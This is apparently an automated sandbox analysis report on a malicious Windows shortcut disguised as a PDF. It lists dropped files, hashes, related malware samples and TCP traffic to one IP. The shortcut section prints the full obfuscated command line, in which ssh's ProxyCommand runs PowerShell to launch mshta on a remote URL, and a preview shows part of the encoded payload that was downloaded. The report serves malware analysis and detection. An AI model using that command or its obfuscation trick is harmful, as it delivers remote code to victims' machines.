                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.83.229
                                                                                                  Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.83.229
                                                                                                  Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 104.21.83.229
                                                                                                  69633f.msiGet hashmaliciousVidarBrowse
                                                                                                  • 104.21.83.229
                                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.83.229

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310720
                                                                                                  Entropy (8bit):0.8307166015914568
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugu:gJjJGtpTq2yv1AuNZRY3diu8iBVqFg
                                                                                                  MD5:DA3800D8CA02630B475AABADE5F55BD9
                                                                                                  SHA1:C1E3BD7360650A2EFD13B0499EF4C9BFA76F54C7
                                                                                                  SHA-256:5668A17CA4ED4D380148CB5DCBA26205888A33B28AA0513DEEC0BC41C55AAEB4
                                                                                                  SHA-512:3F15E297D5F20E18D43428DA9069F3A54A578C339ED23A498ECD37F5482A4DB9B54A115DCF3351F2448657E95AED93B1D670B05344DCA7F10B03C87FA75CB55D
                                                                                                  Malicious:false
                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x525057bf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310720
                                                                                                  Entropy (8bit):0.6585751365014096
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                  MD5:A0EC74A5559828433D4F6B33427E38E6
                                                                                                  SHA1:F892251E8B631D49D06393A1EA51A65C6BC72B84
                                                                                                  SHA-256:D37DB82CE32CC5DA250C1D1C75908AB5BADE2C72D26FA70077BC9355E009CA0D
                                                                                                  SHA-512:77F7D7CC0BC0DF3F57FCE7AEE19286CD9E65ECB9358E0E32D62B061701BB14882442BF52505D63C394C1A239A79D040D00D72B5A1EA9149014EF7FA6B7AF491C
                                                                                                  Malicious:false
                                                                                                  Preview:RPW.... ...............X\...;...{......................0.z..........{...0...|%.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................5>..0...|c...................h..0...|C..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.08128451222520645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:/fyYeUI03lNkGuAJkhvekl1PhltAllrekGltll/SPj:XyzI3srxlDltAJe3l
                                                                                                  MD5:56755CEBD0FFD346A0285CE4C486988C
                                                                                                  SHA1:D5D383D556BA0977842FB6C7A5422C659D512527
                                                                                                  SHA-256:386D29BC1A03947094365BBAE77C55576D2134C5D08D47D506E8F3E2419A3C02
                                                                                                  SHA-512:9D5B1E06D776C825E3F1576550A367132486B829D8B377E74EB7C7CD3A08FC091689C7EFEA2FB90F2108BB2687965BD8AD319452E48DA7355D0ADBF7FC362521
                                                                                                  Malicious:false
                                                                                                  Preview:D\B/.....................................;...{...0...|C......{...............{.......{...XL......{....................h..0...|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\z[1].mp4

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):397568
                                                                                                  Entropy (8bit):3.1457715733720137
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:wZZBLQzvXzIak9YxGMFpGuGXtJS5SJP86uUCLNhvusObcw5+7W+k6:wJZm7GJPqpl9h
                                                                                                  MD5:581AC1AC39C1DB67986949DD1A88E596
                                                                                                  SHA1:17528BCE578B4A1404CFAEA5FBBF5445C0D138A1
                                                                                                  SHA-256:850FE5FCA552CD8EEC40AFD88B540C25395D892A2D21553AF1BF0BBB5B019CF8
                                                                                                  SHA-512:325D6D7F0BB30E3B692206C4C300E74807B54D55AB8F31C7D47FD37D35307761E03BA45112D48994BE2F68FB175EA379F123B11E511908660B0CBA571649E88A
                                                                                                  Malicious:false
                                                                                                  Preview:66e75W6ea63O74Z69t6fI6eT20T6bd47E62c42f4bn28I58i4bq64w65p4dB48g29H7ba76F61Z72k20I6fX53y77c50N64V4fO3dY20R27t27D3bz66b6fE72V20T28A76O61T72i20y41r79E64Z6eJ54q72z20Y3dM20X30w3bV41o79o64l6ek54V72q20P3ci20N58G4bV64P65f4dq48V2el6cg65M6eG67M74l68r3bm20R41T79Y64T6eX54W72q2bM2bu29x7bh76K61m72T20k7ay6eJ70y61l74U20s3dV20o53u74S72V69O6es67z2eQ66k72k6fx6dC43U68Q61w72X43s6fM64X65t28a58R4bx64f65i4dS48v5bO41x79N64z6eX54u72v5de20e2dA20C31H36x38M29d3bN6fw53N77k50y64U4fC20l3dF20Y6fw53y77u50X64w4fm20m2bv20w7al6eT70W61k74Z7dH72Y65m74R75X72q6eE20Z6fh53w77E50B64S4fx7dT3bb76M61L72I20b6fb53w77A50H64h4fO20P3dM20B6ba47K62r42M4bo28d5bZ32h38k30O2cP32T37W39Q2cx32S38v37U2cp32c36V39Z2cH32N38J32y2cL32X38e33k2cJ32a37s32Y2cG32m36N39o2ce32U37t36t2cb32w37s36H2cE32f31D34p2cl32t36a39j2cf32B38C38d2cC32p36R39B2cD32A30F30p2cb32x31J33L2cE32G38q37U2ci32c30y30K2cV32B31t37f2cU32p30y30P2cz32I31t33F2cj32k36m39o2cC32r38q30a2cr32D30g30G2cW32r35k33f2cD32G37A38D2cD32s38I32B2cw32m36h39N2cC32q38p33S2cE32D38c34U2cU32C38S32r2cm32X37T33S2cV3

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9434
                                                                                                  Entropy (8bit):4.928515784730612
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                  MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sddipu5.k4m.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1e4vr5xm.330.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edm41ruz.r3n.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnhwh5h4.hfh.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mz5uhtyh.quj.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv5g2sup.wqx.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkfce3tu.mpa.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymxeg4lq.thw.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55
                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                  Malicious:false
                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
                                                                                                  Entropy (8bit):3.191072174036921
                                                                                                  TrID:
                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                  File name:Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
                                                                                                  File size:2'643 bytes
                                                                                                  MD5:ae4dbbe945aeacfa5bb920e8d85cd0cb
                                                                                                  SHA1:36a91b26586d8e758ac0dcf09f9d5ed40de75b3a
                                                                                                  SHA256:f767f605802f74a578ced15d21e057249c9237dc0b4c09dbadc2d0e996411e91
                                                                                                  SHA512:47defd3a0c17ee59fc1b1c3ec1985a5563982a6998cd13eb6d40aaba4be020e2b2ac8045f80e0f9929aa881053cab43d1a953982d36cdff0612abffcd3ec8809
                                                                                                  SSDEEP:48:8FLZrCPGDaUk1alAs2C3qvV+dJ9bBpBI5Wb:8FFrH2UCo2/tKnvI
                                                                                                  TLSH:AF5186003BE6072CF6735F35987AA630B57BBC01EEA1DB1D0087418C2432A64D5B5F6B
                                                                                                  File Content Preview:L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                  File Icon

                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                  Static Windows Shortcut Info

                                                                                                  General

                                                                                                  Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                                                                  Command Line Argument: -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                  Network Behavior

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 17, 2024 08:48:04.232789040 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:04.232841969 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:04.232916117 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:04.245409012 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:04.245425940 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:05.465539932 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:05.465643883 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:05.518136978 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:05.518203020 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:05.519165039 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:05.519251108 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:05.522032022 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:05.563333035 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135211945 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135260105 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135287046 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135322094 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135346889 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135379076 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135399103 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.135464907 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.135505915 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.136414051 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.143501997 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.144454956 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.144496918 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.148423910 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.152084112 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.152410030 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.160569906 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.164135933 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.164165974 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.164685965 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.255367041 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.256542921 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.259608984 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.260448933 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.326699972 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.326961994 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.330873966 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.332431078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.332467079 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.336426020 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.336786985 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.336852074 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.345210075 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.348432064 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.348455906 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.348519087 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.352425098 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.352509022 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.352541924 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.356422901 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.360573053 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.364234924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.364258051 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.364325047 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.368249893 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.368432999 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.368457079 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.368537903 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.376358032 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.380459070 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.380522966 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.380589962 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.383848906 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.383919001 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.391819954 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.394207954 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.394237041 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.394285917 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.398139954 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.400394917 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.400420904 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.400707006 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.404616117 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.408436060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.408469915 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.412415028 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.440025091 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.440089941 CET49704443192.168.2.5104.21.83.229
